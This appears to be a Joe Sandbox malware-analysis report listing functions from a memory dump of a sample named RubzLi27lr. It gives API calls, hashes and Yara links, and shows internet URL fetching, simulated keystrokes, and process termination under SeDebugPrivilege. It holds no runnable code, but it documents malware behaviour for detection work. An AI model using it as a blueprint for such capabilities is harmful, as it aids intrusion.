                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268354404-0
                                                                                                                  • Opcode ID: e686f0918628fabfb26aa12f4f556764514590f61d8eee1a28998ddfeb5bca11
                                                                                                                  • Instruction ID: 1dcbdfced1941436a7baf462dd7affea26edc960626f2102ef9c0d9e1266204e
                                                                                                                  • Opcode Fuzzy Hash: e686f0918628fabfb26aa12f4f556764514590f61d8eee1a28998ddfeb5bca11
                                                                                                                  • Instruction Fuzzy Hash: E0518670600209EFDB208F28CC55FAA7BB5FB48750F118558F906972E0DB74EE91DB50
                                                                                                                  Function 00B2C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B2C182
                                                                                                                  • GetLastError.KERNEL32 ref: 00B2C195
                                                                                                                  • SetEvent.KERNEL32(?), ref: 00B2C1A9
                                                                                                                    • Part of subcall function 00B2C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B2C272
                                                                                                                    • Part of subcall function 00B2C253: GetLastError.KERNEL32 ref: 00B2C322
                                                                                                                    • Part of subcall function 00B2C253: SetEvent.KERNEL32(?), ref: 00B2C336
                                                                                                                    • Part of subcall function 00B2C253: InternetCloseHandle.WININET(00000000), ref: 00B2C341
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 337547030-0
                                                                                                                  • Opcode ID: 4378090369a32f877f87d1bd5f9d31c55876c77b365b7668d4455412e76c0f34
                                                                                                                  • Instruction ID: 6b40047511a02543aa016ea9b9e40a007517dfb6c9eb22438082c391dd0158c2
                                                                                                                  • Opcode Fuzzy Hash: 4378090369a32f877f87d1bd5f9d31c55876c77b365b7668d4455412e76c0f34
                                                                                                                  • Instruction Fuzzy Hash: 22318B75201B11EFDB219FA5ED44A6ABFF8FF19700B00446DF95A93620DB31E914EBA0
                                                                                                                  Function 00B125A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B13A57
                                                                                                                    • Part of subcall function 00B13A3D: GetCurrentThreadId.KERNEL32 ref: 00B13A5E
                                                                                                                    • Part of subcall function 00B13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B125B3), ref: 00B13A65
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B125BD
                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B125DB
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B125DF
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B125E9
                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B12601
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B12605
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B1260F
                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B12623
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B12627
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2014098862-0
                                                                                                                  • Opcode ID: dd8327e750d8a2fa4e9e1c3f2b9b556690d7bc1ee122b0064b57fa918ec23c77
                                                                                                                  • Instruction ID: 33b6f074563d65ab7f6379227914aadfc09816fe0af3a214a4cae6e5e806fcec
                                                                                                                  • Opcode Fuzzy Hash: dd8327e750d8a2fa4e9e1c3f2b9b556690d7bc1ee122b0064b57fa918ec23c77
                                                                                                                  • Instruction Fuzzy Hash: B901D430391210BBFB1067689C8AF993F99EF4EF12F600001F358AF0D1CDF225848AA9
                                                                                                                  Function 00B11803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B11449,?,?,00000000), ref: 00B1180C
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00B11449,?,?,00000000), ref: 00B11813
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B11449,?,?,00000000), ref: 00B11828
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00B11449,?,?,00000000), ref: 00B11830
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00B11449,?,?,00000000), ref: 00B11833
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B11449,?,?,00000000), ref: 00B11843
                                                                                                                  • GetCurrentProcess.KERNEL32(00B11449,00000000,?,00B11449,?,?,00000000), ref: 00B1184B
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00B11449,?,?,00000000), ref: 00B1184E
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00B11874,00000000,00000000,00000000), ref: 00B11868
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1957940570-0
                                                                                                                  • Opcode ID: 7efd9ce9b1bd24cafb274424bd8d0f9fb9913d3e888024d5d8fe59a59ff599c0
                                                                                                                  • Instruction ID: 2859a263eb8e3fa8f3914c8e7e54dc0fea019e4a4df5fa52f5dbeffca3a2e847
                                                                                                                  • Opcode Fuzzy Hash: 7efd9ce9b1bd24cafb274424bd8d0f9fb9913d3e888024d5d8fe59a59ff599c0
                                                                                                                  • Instruction Fuzzy Hash: 6601AC75241304BFE650ABA9DC49F573BACFB8AB11F504411FA05DB1A1CA7099008B20
                                                                                                                  Function 00B3A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B1D501
                                                                                                                    • Part of subcall function 00B1D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B1D50F
                                                                                                                    • Part of subcall function 00B1D4DC: CloseHandle.KERNEL32(00000000), ref: 00B1D5DC
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B3A16D
                                                                                                                  • GetLastError.KERNEL32 ref: 00B3A180
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B3A1B3
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B3A268
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00B3A273
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3A2C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                  • Opcode ID: 80b12bd092b86bacd56dcae55139c760005336d04a7bdd98d48834743d3e57b9
                                                                                                                  • Instruction ID: e2769bb7fb417a2b782b878b942b3eafc21ea74228b851d6fce3f599968e3745
                                                                                                                  • Opcode Fuzzy Hash: 80b12bd092b86bacd56dcae55139c760005336d04a7bdd98d48834743d3e57b9
                                                                                                                  • Instruction Fuzzy Hash: 3B618E342046419FD710DF19C894F66BBE5AF45318F2484CCE4A68B7A3C776ED49CB92
                                                                                                                  Function 00B43886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B43925
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B4393A
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B43954
                                                                                                                  • _wcslen.LIBCMT ref: 00B43999
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B439C6
                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B439F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                                                  • String ID: SysListView32
                                                                                                                  • API String ID: 2147712094-78025650
                                                                                                                  • Opcode ID: adfa8e4713c0a8c092cc2eef2c2d86f930d4073f10f3947463726e17954a3b3f
                                                                                                                  • Instruction ID: e7bca65972d394f9b0d544ec1a8c7fa2bcd5aba508086e4127276ddae28ad96b
                                                                                                                  • Opcode Fuzzy Hash: adfa8e4713c0a8c092cc2eef2c2d86f930d4073f10f3947463726e17954a3b3f
                                                                                                                  • Instruction Fuzzy Hash: 5A41F131A00208ABEF219FA4CC49BEE7BE9FF08750F140166F959E7281D7719E80DB90
                                                                                                                  Function 00B1BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B1BCFD
                                                                                                                  • IsMenu.USER32(00000000), ref: 00B1BD1D
                                                                                                                  • CreatePopupMenu.USER32 ref: 00B1BD53
                                                                                                                  • GetMenuItemCount.USER32(017E4C38), ref: 00B1BDA4
                                                                                                                  • InsertMenuItemW.USER32(017E4C38,?,00000001,00000030), ref: 00B1BDCC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                  • String ID: 0$2
                                                                                                                  • API String ID: 93392585-3793063076
                                                                                                                  • Opcode ID: e93b315b20f7cc3db3acdd3ff3d203e2a02bfd2347b68573e760bc07d834b314
                                                                                                                  • Instruction ID: 7caf28d11efa196b3cc48254897cde4ff76a9c8ca433f6e184423afe8e32c489
                                                                                                                  • Opcode Fuzzy Hash: e93b315b20f7cc3db3acdd3ff3d203e2a02bfd2347b68573e760bc07d834b314
                                                                                                                  • Instruction Fuzzy Hash: 15518C70A00205ABDB18CFA8E8C5FEEBBF4FF59314F6441A9E411D7291D7709981CB61
                                                                                                                  Function 00B1C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00B1C913
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoad
                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                  • Opcode ID: 8811498b4ff28dd5d2d89e7c06d0090d21bd42e06336ab54f4562d2f38f93c0f
                                                                                                                  • Instruction ID: 17857a88839b7798956b2998fc5c8fb755d204c5858f838160ba273ac670c0c3
                                                                                                                  • Opcode Fuzzy Hash: 8811498b4ff28dd5d2d89e7c06d0090d21bd42e06336ab54f4562d2f38f93c0f
                                                                                                                  • Instruction Fuzzy Hash: FC113D316C9706BBE7065B549CC3CEE3BDCDF153E4B9050ABF904AA2D2E7705E805264
                                                                                                                  Function 00B1DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 642191829-3771769585
                                                                                                                  • Opcode ID: 89bb4fcb60852976a88e70efb07a15b36d3aca0b22cec2a0bcb862e23e59c457
                                                                                                                  • Instruction ID: 5fb80a0fc91f2d429b3712891a65557431d6b32a0702e60131f55098e7781f9e
                                                                                                                  • Opcode Fuzzy Hash: 89bb4fcb60852976a88e70efb07a15b36d3aca0b22cec2a0bcb862e23e59c457
                                                                                                                  • Instruction Fuzzy Hash: F0110632904104AFCF60AB709C4AEEE7BECEF15711F4001AAF40697191EF748AC18A50
                                                                                                                  Function 00B1ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$LocalTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 952045576-0
                                                                                                                  • Opcode ID: eb584c87254c0a5770b745201408a8f524eef7b56051e75b34902238e35c6f54
                                                                                                                  • Instruction ID: 9d223bc801e240bf86f9753925c04b902d0ccb49c167d2086ce3005862ccd3c9
                                                                                                                  • Opcode Fuzzy Hash: eb584c87254c0a5770b745201408a8f524eef7b56051e75b34902238e35c6f54
                                                                                                                  • Instruction Fuzzy Hash: 6F418066C1021876DB11EBB48C8A9CFB7ACAF45710F508463F929E3221FB34E295C7E5
                                                                                                                  Function 00ACF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00ACF953
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00B0F3D1
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00B0F454
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  • Opcode ID: c4f6839f03027ae9dfda58a9de2ac6fba7183078014e40ace50f5e160b0532e6
                                                                                                                  • Instruction ID: 7f3b6a6536a17092c980041dc6ee3cb6d00189d6cfb5105945061249b61efd83
                                                                                                                  • Opcode Fuzzy Hash: c4f6839f03027ae9dfda58a9de2ac6fba7183078014e40ace50f5e160b0532e6
                                                                                                                  • Instruction Fuzzy Hash: E941E635608640BECF798B298888F7A7FE3BB56310F16447DE49757AA0CA35A980C711
                                                                                                                  Function 00B42D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B42D1B
                                                                                                                  • GetDC.USER32(00000000), ref: 00B42D23
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B42D2E
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B42D3A
                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B42D76
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B42D87
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B45A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00B42DC2
                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B42DE1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3864802216-0
                                                                                                                  • Opcode ID: 912c234d122f881031673ac4a5329370498a92d084ec374fb552ae6c437f2d60
                                                                                                                  • Instruction ID: c627af10fe7f9a3c7185c1e7944e85665bef6c9dfb46181f7386bbdd68314c73
                                                                                                                  • Opcode Fuzzy Hash: 912c234d122f881031673ac4a5329370498a92d084ec374fb552ae6c437f2d60
                                                                                                                  • Instruction Fuzzy Hash: 2E316D76202614BBEB214F508C89FEB3FA9FB0AB15F0440A5FE089B291CA759D50D7A4
                                                                                                                  Function 00B15622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2931989736-0
                                                                                                                  • Opcode ID: 8100e8ee9056cd513dc3f56fc794fd95f225f521b61f8c0bf5f6b693c9558b07
                                                                                                                  • Instruction ID: 0556098688b4bf30e1cf65a5bfe7e97daf8092b09154273819e544ef5f56f2b7
                                                                                                                  • Opcode Fuzzy Hash: 8100e8ee9056cd513dc3f56fc794fd95f225f521b61f8c0bf5f6b693c9558b07
                                                                                                                  • Instruction Fuzzy Hash: A421C961640A0AFBD62459219EC2FFA33ECEFA1384F8400A1FD059F682F760EE5091E5
                                                                                                                  Function 00B34FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                  • API String ID: 0-572801152
                                                                                                                  • Opcode ID: 6f9cbde12243b194d977202fc25cafce340189aefbb9d22349b9637fb09741f2
                                                                                                                  • Instruction ID: 18237e6d2d4450eb0c8e6dc8ae50ffaf99315f207ad4738bdfeb49e7cf324ee2
